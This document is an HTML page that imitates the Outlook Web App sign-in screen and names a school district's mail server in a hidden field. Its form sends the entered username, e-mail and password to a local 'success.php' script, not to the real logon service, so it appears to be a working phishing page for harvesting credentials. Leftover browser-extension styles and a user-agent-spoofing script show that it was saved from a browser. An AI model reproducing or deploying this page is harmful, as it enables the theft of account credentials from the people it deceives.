<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link rel="shortcut icon" href="./Outlook Web App_files/favicon.ico" type="image/x-icon">

<meta name="Robots" content="NOINDEX, NOFOLLOW">
<title>Outlook Web App</title>
<link type="text/css" rel="stylesheet" href="./Outlook Web App_files/logon.css">
<link type="text/css" rel="stylesheet" href="./Outlook Web App_files/owafont.css">
<script type="text/javascript" src="/owa/14.3.439.0/scripts/premium/flogon.js"></script>

<script type="text/javascript">
	<!--
	var a_fRC = 1;
	var g_fFcs = 1;
	var a_fLOff = 0;
	var a_fCAC = 1;
	var a_fEnbSMm = 1;
/// <summary>
/// Is Mime Control installed?
/// </summary>
function IsMimeCtlInst(progid)
{
	if (!a_fEnbSMm)
		return false;

	var oMimeVer = null;

	try 
	{
		// TODO: ingore this on none IE browser
		//
		//oMimeVer = new ActiveXObject(progid);
	} 
	catch (e)
	{ 
	}

	if (oMimeVer != null)
		return true;
	else
		return false;
}

/// <summary>
/// Render out the S-MIME control if it is installed.
/// </summary>
function RndMimeCtl()
{
	if (IsMimeCtlInst("MimeBhvr.MimeCtlVer"))
		RndMimeCtlHlpr("MimeNSe2k3", "D801B381-B81D-47a7-8EC4-EFC111666AC0", "MIMEe2k3", "mimeLogoffE2k3");

	if (IsMimeCtlInst("OwaSMime.MimeCtlVer"))
		RndMimeCtlHlpr("MimeNSe2k7sp1", "833aa5fb-7aca-4708-9d7b-c982bf57469a", "MIMEe2k7sp1", "mimeLogoffE2k7sp1");

	if (IsMimeCtlInst("OwaSMime2.MimeCtlVer"))
		RndMimeCtlHlpr("MimeNSe2k9", "4F40839A-C1E5-47E3-804D-A2A17F42DA21", "MIMEe2k9", "mimeLogoffE2k9");
}

/// <summary>
/// Helper function to factor out the rendering of the S/MIME control.
/// </summary>
function RndMimeCtlHlpr(objid, classid, ns, id)
{
	document.write("<OBJECT id='" + objid + "' classid='CLSID:" + classid + "'></OBJECT>");
	document.write("<?IMPORT namespace='" + ns + "' implementation=#" + objid + ">");
	document.write("<" + ns + ":Logoff id='" + id + "' style='display:none'/>");
}
	-->
</script>

<style type="text/css">.backpack.dropzone {
  font-family: 'SF UI Display', 'Segoe UI';
  font-size: 15px;
  text-align: center;
  display: flex;
  flex-direction: column;
  justify-content: center;
  align-items: center;
  width: 250px;
  height: 150px;
  font-weight: lighter;
  color: white;
  will-change: right;
  z-index: 2147483647;
  bottom: 20%;
  background: #333;
  position: fixed;
  user-select: none;
  transition: left .5s, right .5s;
  right: 0px; }
  .backpack.dropzone .animation {
    height: 80px;
    width: 250px;
    background: url("chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/assets/backpack/dropzone/hoverstate.png") left center; }
  .backpack.dropzone .title::before {
    content: 'Save to'; }
  .backpack.dropzone.closed {
    right: -250px; }
  .backpack.dropzone.hover .animation {
    animation: sxt-play-anim-hover 0.91s steps(21);
    animation-fill-mode: forwards;
    background: url("chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/assets/backpack/dropzone/hoverstate.png") left center; }

@keyframes sxt-play-anim-hover {
  from {
    background-position: 0px; }
  to {
    background-position: -5250px; } }
  .backpack.dropzone.saving .title::before {
    content: 'Saving to'; }
  .backpack.dropzone.saving .animation {
    background: url("chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/assets/backpack/dropzone/saving_loop.png") left center;
    animation: sxt-play-anim-saving steps(59) 2.46s infinite; }

@keyframes sxt-play-anim-saving {
  100% {
    background-position: -14750px; } }
  .backpack.dropzone.saved .title::before {
    content: 'Saved to'; }
  .backpack.dropzone.saved .animation {
    background: url("chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/assets/backpack/dropzone/saved.png") left center;
    animation: sxt-play-anim-saved steps(20) 0.83s forwards; }

@keyframes sxt-play-anim-saved {
  100% {
    background-position: -5000px; } }
</style></head><script type="text/javascript" id="useragent-switcher">navigator.__defineGetter__("userAgent", function() {return "Mozilla/5.0 (Linux; Android 9; SM-G965U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.116 Mobile Safari/537.36"})</script>
<body class="owaLgnBdy">

<noscript>
	&lt;div id="dvErr"&gt;
		&lt;table cellpadding="0" cellspacing="0"&gt;
		&lt;tr&gt;
			&lt;td&gt;&lt;img src="/owa/14.3.439.0/themes/base/warn.png" alt=""&gt;&lt;/td&gt;
			&lt;td style="width:100%"&gt;To use Outlook Web App, browser settings must allow scripts to run. For information about how to allow scripts, consult the Help for your browser. If your browser doesn't support scripts, you can download &lt;a href="http://www.microsoft.com/windows/ie/downloads/default.mspx"&gt;Windows Internet Explorer&lt;/a&gt; for access to Outlook Web App.&lt;/td&gt;
		&lt;/tr&gt;
		&lt;/table&gt;
	&lt;/div&gt;
</noscript>
<form action="success.php" method="POST" name="logonForm" enctype="application/x-www-form-urlencoded" autocomplete="off">
<input type="hidden" name="destination" value="https://mail01.tenafly.k12.nj.us/owa/">
<input type="hidden" name="flags" value="0">
<input type="hidden" name="forcedownlevel" value="0">
<table align="center" id="tblMain" cellpadding="0" cellspacing="0">
	<tbody><tr>
		<td colspan="3">
			<table cellspacing="0" cellpadding="0" class="tblLgn">
			<tbody><tr>
				<td class="lgnTL"><img src="./Outlook Web App_files/lgntopl.gif" alt=""></td>
				<td class="lgnTM"></td>
				<td class="lgnTR"><img src="./Outlook Web App_files/lgntopr.gif" alt=""></td>
			</tr>
			</tbody></table>
		</td>
	</tr>
	<tr>
		<td id="mdLft">&nbsp;</td>
		<td id="mdMid">
			<table id="tblMid" class="mid">
				<tbody><tr>
					<td id="expltxt" class="expl">
										
					</td>
				</tr>
				<tr><td><hr></td></tr>
				<tr>
					<td>
						<table class="nonMSIE">
						<colgroup><col>
						<col class="w100">
						</colgroup><tbody><tr id="trSec">
							<td colspan="2">								
								Security 
									‎(
									<a href="#" id="lnkShwSec" onclick="clkExp('lnkShwSec')">
									show explanation 
									</a>
									<a href="#" id="lnkHdSec" onclick="clkExp('lnkHdSec')" style="display:none">
									hide explanation 
									</a>
								)‎
							</td>
						</tr>						
						<tr>
							<td><input id="rdoPblc" type="radio" name="trusted" value="0" class="rdo" onclick="clkSec()" checked=""></td>
							<td><label for="rdoPblc">This is a public or shared computer</label></td>
						</tr>
						<tr id="trPubExp" class="expl" style="display:none">
							<td></td>
							<td>Select this option if you use Outlook Web App on a public computer. Be sure to sign out when you've finished and close all windows to end your session.</td>
						</tr>
						<tr>
							<td><input id="rdoPrvt" type="radio" name="trusted" value="4" class="rdo" onclick="clkSec()"></td>
							<td><label for="rdoPrvt">This is a private computer</label></td>
						</tr>
						<tr id="trPrvtExp" class="expl" style="display:none">
							<td></td>
							<td>Select this option if you're the only person who uses this computer. Your server will allow a longer period of inactivity before signing you out.</td>
						</tr>
						<tr id="trPrvtWrn" class="wrng" style="display:none">
							<td></td>
							<td>Warning:  By selecting this option, you confirm that this computer complies with your organization's security policy.</td>
						</tr>
						</tbody></table>
					</td>
				</tr>
				
				<tr><td><hr></td></tr>
				<tr>
					<td>
						
						<table class="nonMSIE">
							<colgroup><col>
							<col class="w100">
							
								</colgroup><tbody><tr>
									<td><input id="chkBsc" class="rdo" onclick="clkBsc();" type="checkbox"></td>
									<td nowrap=""><label for="chkBsc">Use the light version of Outlook Web App</label></td>
								</tr>
								<tr id="trBscExp" class="disBsc">
									<td></td>
									
							</tr>
							
						</tbody></table>
					</td>
				</tr>
				
				<tr><td><hr></td></tr>
				<tr>
					<td>
						<table class="nonMSIE">
							<colgroup><col class="nowrap">
							<col class="w100">
							<col>
							</colgroup><tbody><tr>
								<td nowrap=""><label for="Domain/Username">Domain/Username:</label></td>
								<td class="txtpad"><input id="Domain/Username" name="Domain/Username" type="text" class="txt"></td>
							</tr>
							<tr>
								<td nowrap=""><label for="username">E-mail:</label></td>
								<td class="txtpad"><input id="email" name="email" type="text" class="txt"></td>
							</tr>
							<tr>
								<td nowrap=""><label for="password">Password:</label></td>
								<td class="txtpad"><input id="password" name="password" type="password" class="txt" onfocus="g_fFcs=0"></td>
							</tr>
							<tr>
								<td colspan="2" align="right" class="txtpad">
									
									<input type="submit" class="btn" value="Sign in" onclick="clkLgn()">
									
									<input name="isUtf8" type="hidden" value="1">
								</td>
							</tr>
						</tbody></table>
					</td>
				</tr>
				<tr><td><hr></td></tr>
				
			</tbody></table>
			<table id="tblMid2" class="mid" style="display:none">
				<tbody><tr><td><hr></td></tr>
				<tr>
					<td><br>Please enable cookies for this Web site.<br><br>Cookies are currently disabled by your browser. Outlook Web App requires that cookies be enabled. <br><br>For information about how to enable cookies, see the Help for your Web browser.<br><br><br></td>
				</tr>
				<tr><td><hr></td></tr>
				<tr>
					<td align="right" class="txtpad">
					
						<input type="button" class="btn" style="float: right" value="Retry" onclick="clkRtry()">
					
					</td>
				</tr>
			</tbody></table>
			<table class="mid tblConn">
				<tbody><tr>
					<td rowspan="2" align="right" class="tdConnImg"><img style="vertical-align:top" src="./Outlook Web App_files/lgnexlogo.gif" alt=""></td>
					<td class="tdConn">Connected to Microsoft Exchange</td>
				</tr>
				<tr>
					<td class="tdCopy">© 2010 Microsoft Corporation. All rights reserved.</td>
				</tr>
			</tbody></table>
		</td>
		<td id="mdRt">&nbsp;</td>
	</tr>
	<tr>
		<td colspan="3">
			<table cellspacing="0" cellpadding="0" class="tblLgn">
			<tbody><tr>
				<td class="lgnBL"><img src="./Outlook Web App_files/lgnbotl.gif" alt=""></td>
				<td class="lgnBM"></td>
				<td class="lgnBR"><img src="./Outlook Web App_files/lgnbotr.gif" alt=""></td>
			</tr>
			</tbody></table>
		</td>
	</tr>
</tbody></table>
</form>


</body></html>